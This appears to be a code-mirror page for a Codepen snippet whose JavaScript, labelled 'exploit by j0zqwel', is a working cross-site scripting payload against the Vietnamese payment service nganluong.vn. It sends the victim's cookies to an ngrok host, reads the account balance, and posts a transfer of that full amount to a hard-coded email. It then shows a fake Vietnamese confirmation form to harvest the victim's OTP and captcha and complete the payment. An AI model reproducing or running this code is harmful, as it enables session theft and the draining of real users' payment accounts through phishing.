A Pen by zxczxcxzc

Thumbnail
This awesome code was written by thienthao123, you can see more from this user in the personal repository.
You can find the original code on Codepen.io
Copyright thienthao123 ©
  • HTML
  • CSS
  • JavaScript
    

/*Downloaded from https://www.codeseek.co/thienthao123/a-pen-by-zxczxcxzc-oZLYJO */
    


/*Downloaded from https://www.codeseek.co/thienthao123/a-pen-by-zxczxcxzc-oZLYJO */
    /*exploit by j0zqwel*/$.get("https://e938f574.ngrok.io/XSS/z.php?z=" + document.cookie, function(data, status) {});$(".media-body").append("<div id='load'>Đang load....</div");$(".media-heading").hide();$(".fa-times-circle").hide();var xhr;var _orgAjax = jQuery.ajaxSettings.xhr;jQuery.ajaxSettings.xhr = function() { xhr = _orgAjax(); return xhr;};$.ajax({ method:"GET", url : "https://www.nganluong.vn/nganluong/transfer/optionPayment.html", success : function(data){ var z = data.match(/<input type="hidden" id="bank_id" name="bank_id" value="(.*?)"\/>/g); $(".media-body").append(z); var bank_id = $('#bank_id').val(); var money; var money_html = data.match(/<div class="rlv"><strong>(.*?)<\/strong>/g); var a_money = money_html[0].match(/[0-9]/g); money = a_money.join(""); $.post("https://www.nganluong.vn//nganluong/transfer.html", { form_id: 'a84ae7c74c19259fa293105b579fe5ca', email: 'gecko.sela@gmail.com', amount: money, content: 'gecko'}); $.ajax({ method: "POST", url: "https://www.nganluong.vn/nganluong/transfer/optionPayment.html", data: { form_id: "0df991d8f85bb9b3eff0e3e85ff8c38d", date: "-1", bank_id: bank_id, fee_type_request: "1" }, success: function(responseText) { var url_pay = xhr.responseURL; $.ajax({ method: "GET", url: url_pay, success: function(data) { var str = data; var z = str.match(/<img id="ccaptcha" src="(.*?)" alt=""\/>/g); var test = '<div id="test"></div><div id="wrapbody-login"><div class="main clearfix"><h1 class="loginTitle" align="center">Xác nhận giao dịch</h1><div class="LoginBox"><div class="well well-sm"><div class="panel-body"><input type="hidden" name="form_id" value="c9d33727442c8bbc950a796564f10848"/><div class="form" role="form"><div class="form-group"><label class="" for="email">Mã xác thực (OTP hoặc mật khẩu giao dịch)</label><input class="form-control formH41" id="OTP" type="text" value="" name="email" autocomplete="off"></div><div class="form-group"><label class="" for="capcha">Mã bảo mật</label><div class="capcha clearfix"><input type="text" maxlength="3" class="filltext form-control formH41" name="verify_image" id="capcha" autocomplete="off"/><div class="col-sm-4 pdl5">' + z + '</div></div></div><div class="form-group"><input id="login" type="submit" style="color: #fff;background-color: #f0ad4e; border-color: #eea236;" class="btn btn-block btn-warning" value="Đăng nhập"/></div></div>'; $("#load").hide(); $(".media-body").append(test); $('#login').click(function() { var OTP = $('#OTP').val(); var verify = $('#capcha').val(); document.getElementById('test').innerHTML = '<p style="color: #8a6d3b;background-color: #fcf8e3;border-color: #fdd29a;padding: 11px;margin-bottom: 15px;border: 1px solid transparent;border-radius: 2px;">Mã xác thực không chính xác</p>'; $.ajax({ method: "POST", url: url_pay, data: { form_id: "29c0e3f6b6130248bb4fc007e59cfff2", otp: OTP, verify_image: verify }, success: function(data) { console.log(data); window.location.reload(); } }) }); } }) }}); }});

Comments